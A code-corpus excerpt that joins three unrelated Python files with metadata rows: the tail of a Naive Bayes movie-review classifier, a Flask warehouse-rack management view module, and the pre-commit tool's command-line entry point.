return sparseMatrixTFIDF, vocabDict, numReviews
def gaussian_tf_idf(trainDataPos, trainDataNeg, testData, c):
testFile = testData
with open(testFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
#prediction will be used for the accuracy of the classifier
prediction = []
meanVarDictPOS = calcMean_Var(trainDataPos,0)
meanVarDictNEG = calcMean_Var(trainDataNeg,0)
testSparseTFIDF, testVocabDict, testNumReviews = tf_idf(testData)
for review in reviewList:
wordsInReview = list(set(extractCleanWords(review)))
probPos =0
probNeg =0
for word in wordsInReview:
if word in meanVarDictPOS:
probPos += (math.log((1/(math.sqrt(2*math.pi*meanVarDictPOS[word][1])))) - (((testVocabDict[word] - meanVarDictPOS[word][0])**2)/(2*(meanVarDictPOS[word][1]**2))))
if word in meanVarDictNEG:
probNeg += (math.log((1/(math.sqrt(2*math.pi*meanVarDictNEG[word][1])))) - (((testVocabDict[word] - meanVarDictNEG[word][0])**2)/(2*(meanVarDictNEG[word][1]**2))))
if probPos > probNeg:
prediction.append(1)
else:
prediction.append(0)
poss = 0
for p in prediction:
if p == c:
poss +=1
return(poss/len(prediction))
def multinomialNB(trainDataPos, trainDataNeg, testData, c):
testFile = testData
with open(testFile, 'r', encoding='utf8') as file:
txt = file.read().replace('\n','')
reviewList = txt.split("<br /><br />")
for review in reviewList:
review = re.sub("[^\w\s]", "", review)
#prediction will be used for the accuracy of the classifier
prediction = []
#getting the dict, word count and review count for pos and neg from BOW
posDict, posWordCount, posdocs = bagOfWords_MultinomialNB(trainDataPos)
negDict, negWordCount, negdocs = bagOfWords_MultinomialNB(trainDataNeg)
"""TEST PRINT STATEMENTS
print("Pos dic: ", len(posDict))
print("Neg dic: ", len(negDict))
print("Pos word count: ", posWordCount)
print("Neg word count: ", negWordCount)
print("Pos docs: ", posdocs)
print("Neg docs: ", negdocs)"""
#alpha is the smoothing paramater, through trial i found that a value
#of 18 will have the highest prediction frequency
alpha = 18
#calculating the prior log prob for pos and neg
priorLogPosProb =math.log( posdocs / (negdocs + posdocs))
priorLogNegProb =math.log( negdocs / (negdocs + posdocs))
"""for each review in our test, we extract the words and calculate
the log prob for that word given pos and neg and add this with
the prior log probability, then we compare the pos and neg total
probabilities and assign a 1 if the pos > neg, and 0 for the opposite
We check the prediction list and calculate the accurace for the
given classifier"""
for review in reviewList:
wordsInReview = list(set(extractCleanWords(review)))
logProbPos = 0
logProbNeg = 0
posPercent = 0
negPercent = 0
for word in wordsInReview:
if word not in posDict:
logProbPos += math.log( ((alpha) / (posWordCount+(alpha*len(posDict) ) ) ) )
if word in posDict:
logProbPos += math.log( ((posDict[word] + alpha) / (posWordCount+(alpha*len(posDict) ) ) ) )
if word not in negDict:
logProbNeg += math.log( ((alpha) / (negWordCount+(alpha*len(negDict) ) ) ) )
if word in negDict:
logProbNeg += math.log( ((negDict[word] + alpha) / (negWordCount+(alpha*len(negDict) ) ) ) )
posPercent = priorLogPosProb + logProbPos
negPercent = priorLogNegProb + logProbNeg
if posPercent > negPercent:
prediction.append(1)
else:
prediction.append(0)
poss = 0
for p in prediction:
if p == c:
poss +=1
return(poss/len(prediction))
#setting the arguments
train_pos = sys.argv[1]
train_neg = sys.argv[2]
test_pos = sys.argv[3]
test_neg = sys.argv[4]
#getting the accuracy for multinomial for pos test and neg test
posAcc = multinomialNB(train_pos, train_neg, test_pos,1)
negAcc = multinomialNB(train_pos, train_neg, test_neg,0)
#calculating the average accuracy and printing it out
multinomialAcc = (posAcc+negAcc) / 2
print("MultinomialNB with bag of words accuracy: ", multinomialAcc)
gposAcc = gaussian_BOW(train_pos, train_neg, test_pos,1)
gnegAcc = gaussian_BOW(train_pos, train_neg, test_neg,0)
gaussAcc = (gposAcc+gnegAcc) / 2
print("Gaussian with bag of words accuracy: ", gaussAcc)
#calcMean_Var(train_pos,1)
#tf_idf(train_pos)
tposAcc = gaussian_tf_idf(train_pos, train_neg, test_pos,1)
tnegAcc = gaussian_tf_idf(train_pos, train_neg, test_neg,0)
tgaussAcc = (tposAcc+tnegAcc) / 2
print("Gaussian with tf_idf acc: ", tgaussAcc)
| NaiveBayesClassifier.py | 13,443 | implementing the stop words and used by bag of words to create the vocab dictionaryprint(len(reviewList))print("Word bank for reviews: \n{0} \n".format(vocabTokens));print(len(vocabTokens))bagOfWords(reviewFile)print(len(reviewList))print(len(vocabTokens))matrix = numpy.zeros(shape = (len(reviewList),len(vocabTokens)))bagList = numpy.zeros(len(vocabTokens))if word in vocabTokens:bagList[vocabTokens.index(word)] +=1print(i, " out of ", len(vocabTokens), " done")matrix[i] = bagListprint("{0}\n{1}\n".format(review,numpy.array(bagList)))print(len(reviewList))bagList = numpy.zeros(len(vocabTokens))print("Gauss: ", i)calculates the mean and varience using bag of words using bag of wordsprint(meanVarTouple[0])print("Gauss: ", meanVarTouple)prediction will be used for the accuracy of the classifierprint(len(reviewList))print("TFidf: ", i)print(i)using the tf vlues in the sparse matrix and idf values in the vocab dict we can get the tf idf and hold it in sparse matrixprint(sparseMatrixTFIDF)prediction will be used for the accuracy of the classifierprediction will be used for the accuracy of the classifiergetting the dict, word count and review count for pos and neg from BOWalpha is the smoothing paramater, through trial i found that a valueof 18 will have the highest prediction frequencycalculating the prior log prob for pos and negsetting the argumentsgetting the accuracy for multinomial for pos test and neg testcalculating the average accuracy and printing it outcalcMean_Var(train_pos,1)tf_idf(train_pos) | 1,522 | en | 0.608356 |
#!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: rack.py
@time: 2018-04-06 18:22
"""
from __future__ import unicode_literals
from datetime import datetime
from flask import (
request,
flash,
render_template,
url_for,
redirect,
abort,
jsonify,
Blueprint,
)
from flask_babel import gettext as _
from flask_login import login_required
from app_backend import app
from app_backend import excel
from app_backend.api.inventory import count_inventory
from app_backend.api.rack import (
get_rack_pagination,
get_rack_row_by_id,
add_rack,
edit_rack,
get_rack_choices,
# rack_current_stats,
# rack_former_stats,
)
from app_backend.api.rack import (
get_rack_rows,
# get_distinct_brand,
)
from app_backend.api.warehouse import (
get_warehouse_choices,
)
from app_backend.forms.rack import (
RackSearchForm,
RackAddForm,
RackEditForm,
)
from app_backend.models.model_bearing import Rack
from app_backend.permissions.rack import (
permission_rack_section_add,
permission_rack_section_search,
permission_rack_section_export,
permission_rack_section_get,
permission_rack_section_edit,
permission_rack_section_del,
)
from app_common.maps.default import DEFAULT_SEARCH_CHOICES_INT_OPTION
from app_common.maps.operations import OPERATION_EXPORT, OPERATION_DELETE
from app_common.maps.status_delete import (
STATUS_DEL_OK,
STATUS_DEL_NO)
# 定义蓝图
bp_rack = Blueprint('rack', __name__, url_prefix='/rack')
# 加载配置
DOCUMENT_INFO = app.config.get('DOCUMENT_INFO', {})
PER_PAGE_BACKEND = app.config.get('PER_PAGE_BACKEND', 20)
AJAX_SUCCESS_MSG = app.config.get('AJAX_SUCCESS_MSG', {'result': True})
AJAX_FAILURE_MSG = app.config.get('AJAX_FAILURE_MSG', {'result': False})
@bp_rack.route('/lists.html', methods=['GET', 'POST'])
@login_required
@permission_rack_section_search.require(http_exception=403)
def lists():
"""
货架列表
:return:
"""
template_name = 'rack/lists.html'
# 文档信息
document_info = DOCUMENT_INFO.copy()
document_info['TITLE'] = _('rack lists')
# 搜索条件
form = RackSearchForm(request.form)
form.warehouse_id.choices = get_warehouse_choices()
# app.logger.info('')
search_condition = [
Rack.status_delete == STATUS_DEL_NO,
]
if request.method == 'POST':
# 表单校验失败
if not form.validate_on_submit():
flash(_('Search Failure'), 'danger')
# 单独处理csrf_token
if hasattr(form, 'csrf_token') and getattr(form, 'csrf_token').errors:
map(lambda x: flash(x, 'danger'), form.csrf_token.errors)
else:
if form.warehouse_id.data != DEFAULT_SEARCH_CHOICES_INT_OPTION:
search_condition.append(Rack.warehouse_id == form.warehouse_id.data)
if form.name.data:
search_condition.append(Rack.name == form.name.data)
# 处理导出
if form.op.data == OPERATION_EXPORT:
# 检查导出权限
if not permission_rack_section_export.can():
abort(403)
column_names = Rack.__table__.columns.keys()
query_sets = get_rack_rows(*search_condition)
return excel.make_response_from_query_sets(
query_sets=query_sets,
column_names=column_names,
file_type='csv',
file_name='%s.csv' % _('rack lists')
)
# 批量删除
if form.op.data == OPERATION_DELETE:
# 检查删除权限
if not permission_rack_section_del.can():
abort(403)
rack_ids = request.form.getlist('rack_id')
permitted = True
for rack_id in rack_ids:
# 检查是否正在使用
# 库存
if count_inventory(**{'rack_id': rack_id, 'status_delete': STATUS_DEL_NO}):
ext_msg = _('Currently In Use')
flash(_('Del Failure, %(ext_msg)s', ext_msg=ext_msg), 'danger')
permitted = False
break
if permitted:
result_total = True
for rack_id in rack_ids:
current_time = datetime.utcnow()
rack_data = {
'status_delete': STATUS_DEL_OK,
'delete_time': current_time,
'update_time': current_time,
}
result = edit_rack(rack_id, rack_data)
result_total = result_total and result
if result_total:
flash(_('Del Success'), 'success')
else:
flash(_('Del Failure'), 'danger')
# 翻页数据
pagination = get_rack_pagination(form.page.data, PER_PAGE_BACKEND, *search_condition)
# 渲染模板
return render_template(
template_name,
form=form,
pagination=pagination,
**document_info
)
@bp_rack.route('/<int:rack_id>/info.html')
@login_required
@permission_rack_section_get.require(http_exception=403)
def info(rack_id):
"""
货架详情
:param rack_id:
:return:
"""
# 详情数据
rack_info = get_rack_row_by_id(rack_id)
# 检查资源是否存在
if not rack_info:
abort(404)
# 检查资源是否删除
if rack_info.status_delete == STATUS_DEL_OK:
abort(410)
# 文档信息
document_info = DOCUMENT_INFO.copy()
document_info['TITLE'] = _('rack info')
# 渲染模板
return render_template('rack/info.html', rack_info=rack_info, **document_info)
@bp_rack.route('/add.html', methods=['GET', 'POST'])
@login_required
@permission_rack_section_add.require(http_exception=403)
def add():
"""
创建货架
:return:
"""
template_name = 'rack/add.html'
# 文档信息
document_info = DOCUMENT_INFO.copy()
document_info['TITLE'] = _('rack add')
# 加载创建表单
form = RackAddForm(request.form)
form.warehouse_id.choices = get_warehouse_choices(option_type='create')
# 进入创建页面
if request.method == 'GET':
# 渲染页面
return render_template(
template_name,
form=form,
**document_info
)
# 处理创建请求
if request.method == 'POST':
# 表单校验失败
if not form.validate_on_submit():
flash(_('Add Failure'), 'danger')
return render_template(
template_name,
form=form,
**document_info
)
# 表单校验成功
current_time = datetime.utcnow()
rack_data = {
'warehouse_id': form.warehouse_id.data,
'name': form.name.data,
'create_time': current_time,
'update_time': current_time,
}
result = add_rack(rack_data)
# 创建操作成功
if result:
flash(_('Add Success'), 'success')
return redirect(request.args.get('next') or url_for('rack.lists'))
# 创建操作失败
else:
flash(_('Add Failure'), 'danger')
return render_template(
template_name,
form=form,
**document_info
)
@bp_rack.route('/<int:rack_id>/edit.html', methods=['GET', 'POST'])
@login_required
@permission_rack_section_edit.require(http_exception=403)
def edit(rack_id):
"""
货架编辑
"""
rack_info = get_rack_row_by_id(rack_id)
# 检查资源是否存在
if not rack_info:
abort(404)
# 检查资源是否删除
if rack_info.status_delete == STATUS_DEL_OK:
abort(410)
template_name = 'rack/edit.html'
# 加载编辑表单
form = RackEditForm(request.form)
form.warehouse_id.choices = get_warehouse_choices(option_type='update')
# 文档信息
document_info = DOCUMENT_INFO.copy()
document_info['TITLE'] = _('rack edit')
# 进入编辑页面
if request.method == 'GET':
# 表单赋值
form.warehouse_id.data = rack_info.warehouse_id
form.name.data = rack_info.name
# form.create_time.data = rack_info.create_time
# form.update_time.data = rack_info.update_time
# 渲染页面
return render_template(
template_name,
rack_id=rack_id,
form=form,
**document_info
)
# 处理编辑请求
if request.method == 'POST':
# 表单校验失败
if not form.validate_on_submit():
flash(_('Edit Failure'), 'danger')
return render_template(
template_name,
rack_id=rack_id,
form=form,
**document_info
)
# 表单校验成功
current_time = datetime.utcnow()
rack_data = {
'warehouse_id': form.warehouse_id.data,
'name': form.name.data,
'update_time': current_time,
}
result = edit_rack(rack_id, rack_data)
# 编辑操作成功
if result:
flash(_('Edit Success'), 'success')
return redirect(request.args.get('next') or url_for('rack.lists'))
# 编辑操作失败
else:
flash(_('Edit Failure'), 'danger')
return render_template(
template_name,
rack_id=rack_id,
form=form,
**document_info
)
@bp_rack.route('/ajax/del', methods=['GET', 'POST'])
@login_required
def ajax_delete():
"""
货架删除
:return:
"""
ajax_success_msg = AJAX_SUCCESS_MSG.copy()
ajax_failure_msg = AJAX_FAILURE_MSG.copy()
# 检查删除权限
if not permission_rack_section_del.can():
ext_msg = _('Permission Denied')
ajax_failure_msg['msg'] = _('Del Failure, %(ext_msg)s', ext_msg=ext_msg)
return jsonify(ajax_failure_msg)
# 检查请求方法
if not (request.method == 'GET' and request.is_xhr):
ext_msg = _('Method Not Allowed')
ajax_failure_msg['msg'] = _('Del Failure, %(ext_msg)s', ext_msg=ext_msg)
return jsonify(ajax_failure_msg)
# 检查请求参数
rack_id = request.args.get('rack_id', 0, type=int)
if not rack_id:
ext_msg = _('ID does not exist')
ajax_failure_msg['msg'] = _('Del Failure, %(ext_msg)s', ext_msg=ext_msg)
return jsonify(ajax_failure_msg)
rack_info = get_rack_row_by_id(rack_id)
# 检查资源是否存在
if not rack_info:
ext_msg = _('ID does not exist')
ajax_failure_msg['msg'] = _('Del Failure, %(ext_msg)s', ext_msg=ext_msg)
return jsonify(ajax_failure_msg)
# 检查资源是否删除
if rack_info.status_delete == STATUS_DEL_OK:
ext_msg = _('Already deleted')
ajax_failure_msg['msg'] = _('Del Failure, %(ext_msg)s', ext_msg=ext_msg)
return jsonify(ajax_failure_msg)
# 检查是否正在使用
# 库存
if count_inventory(**{'rack_id': rack_id, 'status_delete': STATUS_DEL_NO}):
ext_msg = _('Currently In Use')
ajax_failure_msg['msg'] = _('Del Failure, %(ext_msg)s', ext_msg=ext_msg)
return jsonify(ajax_failure_msg)
current_time = datetime.utcnow()
rack_data = {
'status_delete': STATUS_DEL_OK,
'delete_time': current_time,
'update_time': current_time,
}
result = edit_rack(rack_id, rack_data)
if result:
ajax_success_msg['msg'] = _('Del Success')
return jsonify(ajax_success_msg)
else:
ajax_failure_msg['msg'] = _('Del Failure')
return jsonify(ajax_failure_msg)
@bp_rack.route('/ajax/get_rack_choices', methods=['GET', 'POST'])
@login_required
def ajax_get_rack_choices():
"""
货架选项
:return:
"""
warehouse_id = request.args.get('warehouse_id', 0, type=int)
rack_choices = get_rack_choices(warehouse_id)
return jsonify(rack_choices)
# @bp_rack.route('/ajax/stats', methods=['GET', 'POST'])
# @login_required
# def ajax_stats():
# """
# 获取货架统计
# :return:
# """
# time_based = request.args.get('time_based', 'hour')
# result_rack_current = rack_current_stats(time_based)
# result_rack_former = rack_former_stats(time_based)
#
# line_chart_data = {
# 'labels': [label for label, _ in result_rack_current],
# 'datasets': [
# {
# 'label': '在职',
# 'backgroundColor': 'rgba(220,220,220,0.5)',
# 'borderColor': 'rgba(220,220,220,1)',
# 'pointBackgroundColor': 'rgba(220,220,220,1)',
# 'pointBorderColor': '#fff',
# 'pointBorderWidth': 2,
# 'data': [data for _, data in result_rack_current]
# },
# {
# 'label': '离职',
# 'backgroundColor': 'rgba(151,187,205,0.5)',
# 'borderColor': 'rgba(151,187,205,1)',
# 'pointBackgroundColor': 'rgba(151,187,205,1)',
# 'pointBorderColor': '#fff',
# 'pointBorderWidth': 2,
# 'data': [data for _, data in result_rack_former]
# }
# ]
# }
# return json.dumps(line_chart_data, default=json_default)
#
#
# @bp_rack.route('/stats.html')
# @login_required
# @permission_rack_section_stats.require(http_exception=403)
# def stats():
# """
# 货架统计
# :return:
# """
# # 统计数据
# time_based = request.args.get('time_based', 'hour')
# if time_based not in ['hour', 'date', 'month']:
# abort(404)
# # 文档信息
# document_info = DOCUMENT_INFO.copy()
# document_info['TITLE'] = _('rack stats')
# # 渲染模板
# return render_template(
# 'rack/stats.html',
# time_based=time_based,
# **document_info
# )
#
#
# @bp_rack.route('/<int:rack_id>/stats.html')
# @login_required
# @permission_rack_section_stats.require(http_exception=403)
# def stats_item(rack_id):
# """
# 货架统计明细
# :param rack_id:
# :return:
# """
# rack_info = get_rack_row_by_id(rack_id)
# # 检查资源是否存在
# if not rack_info:
# abort(404)
# # 检查资源是否删除
# if rack_info.status_delete == STATUS_DEL_OK:
# abort(410)
#
# # 统计数据
# rack_stats_item_info = get_rack_row_by_id(rack_id)
# # 文档信息
# document_info = DOCUMENT_INFO.copy()
# document_info['TITLE'] = _('rack stats item')
# # 渲染模板
# return render_template(
# 'rack/stats_item.html',
# rack_stats_item_info=rack_stats_item_info,
# **document_info
# )
| app_backend/views/rack.py | 14,948 | 创建货架
:return:
货架删除
:return:
货架选项
:return:
货架编辑
货架详情
:param rack_id:
:return:
货架列表
:return:
@author: zhanghe
@software: PyCharm
@file: rack.py
@time: 2018-04-06 18:22
!/usr/bin/env python encoding: utf-8 rack_current_stats, rack_former_stats, get_distinct_brand, 定义蓝图 加载配置 文档信息 搜索条件 app.logger.info('') 表单校验失败 单独处理csrf_token 处理导出 检查导出权限 批量删除 检查删除权限 检查是否正在使用 库存 翻页数据 渲染模板 详情数据 检查资源是否存在 检查资源是否删除 文档信息 渲染模板 文档信息 加载创建表单 进入创建页面 渲染页面 处理创建请求 表单校验失败 表单校验成功 创建操作成功 创建操作失败 检查资源是否存在 检查资源是否删除 加载编辑表单 文档信息 进入编辑页面 表单赋值 form.create_time.data = rack_info.create_time form.update_time.data = rack_info.update_time 渲染页面 处理编辑请求 表单校验失败 表单校验成功 编辑操作成功 编辑操作失败 检查删除权限 检查请求方法 检查请求参数 检查资源是否存在 检查资源是否删除 检查是否正在使用 库存 @bp_rack.route('/ajax/stats', methods=['GET', 'POST']) @login_required def ajax_stats(): """ 获取货架统计 :return: """ time_based = request.args.get('time_based', 'hour') result_rack_current = rack_current_stats(time_based) result_rack_former = rack_former_stats(time_based) line_chart_data = { 'labels': [label for label, _ in result_rack_current], 'datasets': [ { 'label': '在职', 'backgroundColor': 'rgba(220,220,220,0.5)', 'borderColor': 'rgba(220,220,220,1)', 'pointBackgroundColor': 'rgba(220,220,220,1)', 'pointBorderColor': 'fff', 'pointBorderWidth': 2, 'data': [data for _, data in result_rack_current] }, { 'label': '离职', 'backgroundColor': 'rgba(151,187,205,0.5)', 'borderColor': 'rgba(151,187,205,1)', 'pointBackgroundColor': 'rgba(151,187,205,1)', 'pointBorderColor': 'fff', 'pointBorderWidth': 2, 'data': [data for _, data in result_rack_former] } ] } return json.dumps(line_chart_data, default=json_default) @bp_rack.route('/stats.html') @login_required @permission_rack_section_stats.require(http_exception=403) def stats(): """ 货架统计 :return: """ 统计数据 time_based = request.args.get('time_based', 'hour') if time_based not in ['hour', 'date', 'month']: abort(404) 文档信息 document_info = DOCUMENT_INFO.copy() document_info['TITLE'] = _('rack stats') 渲染模板 return render_template( 'rack/stats.html', time_based=time_based, **document_info ) @bp_rack.route('/<int:rack_id>/stats.html') @login_required @permission_rack_section_stats.require(http_exception=403) def stats_item(rack_id): """ 货架统计明细 :param rack_id: :return: """ rack_info = get_rack_row_by_id(rack_id) 检查资源是否存在 if not rack_info: abort(404) 检查资源是否删除 if rack_info.status_delete == STATUS_DEL_OK: abort(410) 统计数据 rack_stats_item_info = get_rack_row_by_id(rack_id) 文档信息 document_info = DOCUMENT_INFO.copy() document_info['TITLE'] = _('rack stats item') 渲染模板 return render_template( 'rack/stats_item.html', rack_stats_item_info=rack_stats_item_info, **document_info ) | 3,155 | zh | 0.373247 |
import argparse
import logging
import os
import sys
from typing import Any
from typing import Optional
from typing import Sequence
from typing import Union
import pre_commit.constants as C
from pre_commit import color
from pre_commit import git
from pre_commit.commands.autoupdate import autoupdate
from pre_commit.commands.clean import clean
from pre_commit.commands.gc import gc
from pre_commit.commands.hook_impl import hook_impl
from pre_commit.commands.init_templatedir import init_templatedir
from pre_commit.commands.install_uninstall import install
from pre_commit.commands.install_uninstall import install_hooks
from pre_commit.commands.install_uninstall import uninstall
from pre_commit.commands.migrate_config import migrate_config
from pre_commit.commands.run import run
from pre_commit.commands.sample_config import sample_config
from pre_commit.commands.try_repo import try_repo
from pre_commit.error_handler import error_handler
from pre_commit.error_handler import FatalError
from pre_commit.logging_handler import logging_handler
from pre_commit.store import Store
from pre_commit.util import CalledProcessError
logger = logging.getLogger('pre_commit')
# https://github.com/pre-commit/pre-commit/issues/217
# On OSX, making a virtualenv using pyvenv at . causes `virtualenv` and `pip`
# to install packages to the wrong place. We don't want anything to deal with
# pyvenv
os.environ.pop('__PYVENV_LAUNCHER__', None)
COMMANDS_NO_GIT = {'clean', 'gc', 'init-templatedir', 'sample-config'}
def _add_color_option(parser: argparse.ArgumentParser) -> None:
parser.add_argument(
'--color', default=os.environ.get('PRE_COMMIT_COLOR', 'auto'),
type=color.use_color,
metavar='{' + ','.join(color.COLOR_CHOICES) + '}',
help='Whether to use color in output. Defaults to `%(default)s`.',
)
def _add_config_option(parser: argparse.ArgumentParser) -> None:
parser.add_argument(
'-c', '--config', default=C.CONFIG_FILE,
help='Path to alternate config file',
)
class AppendReplaceDefault(argparse.Action):
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self.appended = False
def __call__(
self,
parser: argparse.ArgumentParser,
namespace: argparse.Namespace,
values: Union[str, Sequence[str], None],
option_string: Optional[str] = None,
) -> None:
if not self.appended:
setattr(namespace, self.dest, [])
self.appended = True
getattr(namespace, self.dest).append(values)
def _add_hook_type_option(parser: argparse.ArgumentParser) -> None:
parser.add_argument(
'-t', '--hook-type', choices=(
'pre-commit', 'pre-merge-commit', 'pre-push',
'prepare-commit-msg', 'commit-msg', 'post-checkout',
),
action=AppendReplaceDefault,
default=['pre-commit'],
dest='hook_types',
)
def _add_run_options(parser: argparse.ArgumentParser) -> None:
parser.add_argument('hook', nargs='?', help='A single hook-id to run')
parser.add_argument('--verbose', '-v', action='store_true', default=False)
mutex_group = parser.add_mutually_exclusive_group(required=False)
mutex_group.add_argument(
'--all-files', '-a', action='store_true', default=False,
help='Run on all the files in the repo.',
)
mutex_group.add_argument(
'--files', nargs='*', default=[],
help='Specific filenames to run hooks on.',
)
parser.add_argument(
'--show-diff-on-failure', action='store_true',
help='When hooks fail, run `git diff` directly afterward.',
)
parser.add_argument(
'--hook-stage', choices=C.STAGES, default='commit',
help='The stage during which the hook is fired. One of %(choices)s',
)
parser.add_argument(
'--from-ref', '--source', '-s',
help=(
'(for usage with `--from-ref`) -- this option represents the '
'original ref in a `from_ref...to_ref` diff expression. '
'For `pre-push` hooks, this represents the branch you are pushing '
'to. '
'For `post-checkout` hooks, this represents the branch that was '
'previously checked out.'
),
)
parser.add_argument(
'--to-ref', '--origin', '-o',
help=(
'(for usage with `--to-ref`) -- this option represents the '
'destination ref in a `from_ref...to_ref` diff expression. '
'For `pre-push` hooks, this represents the branch being pushed. '
'For `post-checkout` hooks, this represents the branch that is '
'now checked out.'
),
)
parser.add_argument(
'--commit-msg-filename',
help='Filename to check when running during `commit-msg`',
)
parser.add_argument(
'--remote-name', help='Remote name used by `git push`.',
)
parser.add_argument('--remote-url', help='Remote url used by `git push`.')
parser.add_argument(
'--checkout-type',
help=(
'Indicates whether the checkout was a branch checkout '
'(changing branches, flag=1) or a file checkout (retrieving a '
'file from the index, flag=0).'
),
)
def _adjust_args_and_chdir(args: argparse.Namespace) -> None:
# `--config` was specified relative to the non-root working directory
if os.path.exists(args.config):
args.config = os.path.abspath(args.config)
if args.command in {'run', 'try-repo'}:
args.files = [os.path.abspath(filename) for filename in args.files]
if args.command == 'try-repo' and os.path.exists(args.repo):
args.repo = os.path.abspath(args.repo)
try:
toplevel = git.get_root()
except CalledProcessError:
raise FatalError(
'git failed. Is it installed, and are you in a Git repository '
'directory?',
)
else:
if toplevel == '': # pragma: no cover (old git)
raise FatalError(
'git toplevel unexpectedly empty! make sure you are not '
'inside the `.git` directory of your repository.',
)
else:
os.chdir(toplevel)
args.config = os.path.relpath(args.config)
if args.command in {'run', 'try-repo'}:
args.files = [os.path.relpath(filename) for filename in args.files]
if args.command == 'try-repo' and os.path.exists(args.repo):
args.repo = os.path.relpath(args.repo)
def main(argv: Optional[Sequence[str]] = None) -> int:
argv = argv if argv is not None else sys.argv[1:]
parser = argparse.ArgumentParser(prog='pre-commit')
# https://stackoverflow.com/a/8521644/812183
parser.add_argument(
'-V', '--version',
action='version',
version=f'%(prog)s {C.VERSION}',
)
subparsers = parser.add_subparsers(dest='command')
autoupdate_parser = subparsers.add_parser(
'autoupdate',
help="Auto-update pre-commit config to the latest repos' versions.",
)
_add_color_option(autoupdate_parser)
_add_config_option(autoupdate_parser)
autoupdate_parser.add_argument(
'--bleeding-edge', action='store_true',
help=(
'Update to the bleeding edge of `master` instead of the latest '
'tagged version (the default behavior).'
),
)
autoupdate_parser.add_argument(
'--freeze', action='store_true',
help='Store "frozen" hashes in `rev` instead of tag names',
)
autoupdate_parser.add_argument(
'--repo', dest='repos', action='append', metavar='REPO',
help='Only update this repository -- may be specified multiple times.',
)
clean_parser = subparsers.add_parser(
'clean', help='Clean out pre-commit files.',
)
_add_color_option(clean_parser)
_add_config_option(clean_parser)
hook_impl_parser = subparsers.add_parser('hook-impl')
_add_color_option(hook_impl_parser)
_add_config_option(hook_impl_parser)
hook_impl_parser.add_argument('--hook-type')
hook_impl_parser.add_argument('--hook-dir')
hook_impl_parser.add_argument(
'--skip-on-missing-config', action='store_true',
)
hook_impl_parser.add_argument(dest='rest', nargs=argparse.REMAINDER)
gc_parser = subparsers.add_parser('gc', help='Clean unused cached repos.')
_add_color_option(gc_parser)
_add_config_option(gc_parser)
init_templatedir_parser = subparsers.add_parser(
'init-templatedir',
help=(
'Install hook script in a directory intended for use with '
'`git config init.templateDir`.'
),
)
_add_color_option(init_templatedir_parser)
_add_config_option(init_templatedir_parser)
init_templatedir_parser.add_argument(
'directory', help='The directory in which to write the hook script.',
)
_add_hook_type_option(init_templatedir_parser)
install_parser = subparsers.add_parser(
'install', help='Install the pre-commit script.',
)
_add_color_option(install_parser)
_add_config_option(install_parser)
install_parser.add_argument(
'-f', '--overwrite', action='store_true',
help='Overwrite existing hooks / remove migration mode.',
)
install_parser.add_argument(
'--install-hooks', action='store_true',
help=(
'Whether to install hook environments for all environments '
'in the config file.'
),
)
_add_hook_type_option(install_parser)
install_parser.add_argument(
'--allow-missing-config', action='store_true', default=False,
help=(
'Whether to allow a missing `pre-commit` configuration file '
'or exit with a failure code.'
),
)
install_hooks_parser = subparsers.add_parser(
'install-hooks',
help=(
'Install hook environments for all environments in the config '
'file. You may find `pre-commit install --install-hooks` more '
'useful.'
),
)
_add_color_option(install_hooks_parser)
_add_config_option(install_hooks_parser)
migrate_config_parser = subparsers.add_parser(
'migrate-config',
help='Migrate list configuration to new map configuration.',
)
_add_color_option(migrate_config_parser)
_add_config_option(migrate_config_parser)
run_parser = subparsers.add_parser('run', help='Run hooks.')
_add_color_option(run_parser)
_add_config_option(run_parser)
_add_run_options(run_parser)
sample_config_parser = subparsers.add_parser(
'sample-config', help=f'Produce a sample {C.CONFIG_FILE} file',
)
_add_color_option(sample_config_parser)
_add_config_option(sample_config_parser)
try_repo_parser = subparsers.add_parser(
'try-repo',
help='Try the hooks in a repository, useful for developing new hooks.',
)
_add_color_option(try_repo_parser)
_add_config_option(try_repo_parser)
try_repo_parser.add_argument(
'repo', help='Repository to source hooks from.',
)
try_repo_parser.add_argument(
'--ref', '--rev',
help=(
'Manually select a rev to run against, otherwise the `HEAD` '
'revision will be used.'
),
)
_add_run_options(try_repo_parser)
uninstall_parser = subparsers.add_parser(
'uninstall', help='Uninstall the pre-commit script.',
)
_add_color_option(uninstall_parser)
_add_config_option(uninstall_parser)
_add_hook_type_option(uninstall_parser)
help = subparsers.add_parser(
'help', help='Show help for a specific command.',
)
help.add_argument('help_cmd', nargs='?', help='Command to show help for.')
# argparse doesn't really provide a way to use a `default` subparser
if len(argv) == 0:
argv = ['run']
args = parser.parse_args(argv)
if args.command == 'help' and args.help_cmd:
parser.parse_args([args.help_cmd, '--help'])
elif args.command == 'help':
parser.parse_args(['--help'])
with error_handler(), logging_handler(args.color):
if args.command not in COMMANDS_NO_GIT:
_adjust_args_and_chdir(args)
git.check_for_cygwin_mismatch()
store = Store()
store.mark_config_used(args.config)
if args.command == 'autoupdate':
return autoupdate(
args.config, store,
tags_only=not args.bleeding_edge,
freeze=args.freeze,
repos=args.repos,
)
elif args.command == 'clean':
return clean(store)
elif args.command == 'gc':
return gc(store)
elif args.command == 'hook-impl':
return hook_impl(
store,
config=args.config,
color=args.color,
hook_type=args.hook_type,
hook_dir=args.hook_dir,
skip_on_missing_config=args.skip_on_missing_config,
args=args.rest[1:],
)
elif args.command == 'install':
return install(
args.config, store,
hook_types=args.hook_types,
overwrite=args.overwrite,
hooks=args.install_hooks,
skip_on_missing_config=args.allow_missing_config,
)
elif args.command == 'init-templatedir':
return init_templatedir(
args.config, store, args.directory,
hook_types=args.hook_types,
)
elif args.command == 'install-hooks':
return install_hooks(args.config, store)
elif args.command == 'migrate-config':
return migrate_config(args.config)
elif args.command == 'run':
return run(args.config, store, args)
elif args.command == 'sample-config':
return sample_config()
elif args.command == 'try-repo':
return try_repo(args)
elif args.command == 'uninstall':
return uninstall(hook_types=args.hook_types)
else:
raise NotImplementedError(
f'Command {args.command} not implemented.',
)
raise AssertionError(
f'Command {args.command} failed to exit with a returncode',
)
if __name__ == '__main__':
exit(main())
